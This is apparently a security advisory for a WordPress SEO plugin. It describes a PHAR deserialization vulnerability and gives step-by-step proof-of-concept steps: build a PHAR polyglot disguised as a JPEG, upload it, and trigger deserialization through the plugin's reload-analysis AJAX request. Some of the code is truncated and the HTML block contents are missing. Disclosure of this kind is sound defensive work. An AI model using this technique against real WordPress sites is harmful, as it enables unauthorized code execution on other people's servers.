The plugin does not validate image file paths before attempting to manipulate the image files, leading to a PHAR deserialization vulnerability. Furthermore, the plugin contains a gadget chain which may be used in certain configurations to achieve remote code execution.
1. Use a WordPress instance on PHP 7.x. 2. Create a PHP file create_phar.php
with the following code: startBuffering(); $phar->addFromString(‘test.png’, ‘text’); $phar->setStub(“\xff\xd8\xff\n”); $phar->setMetadata(new Evil()); $phar->stopBuffering(); 3. Create the PHAR file poc.phar
by running php --define phar.readonly=0 create_phar.php
4. Rename poc.phar
to poc.jpg
5. Upload poc.jpg
using the Media Editor. Take note of its path within wp-content/uploads
6. Add the following code to the site in order to simulate a gadget: class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } 7. Create or edit a post or page in the block editor. Add an HTML
block with the following contents (but replace any parts of the path to poc.jpg
as needed for your test server). 8. Without saving the post or page, open the browser console to view network traffic, then click on “Reload Analysis” in the “SEO Page Optimization” section. Notice the admin-ajax
request with action=wpms
and task=reload_analysis
returns with the text “Arbitrary deserialization”, demonstrating the vulnerability.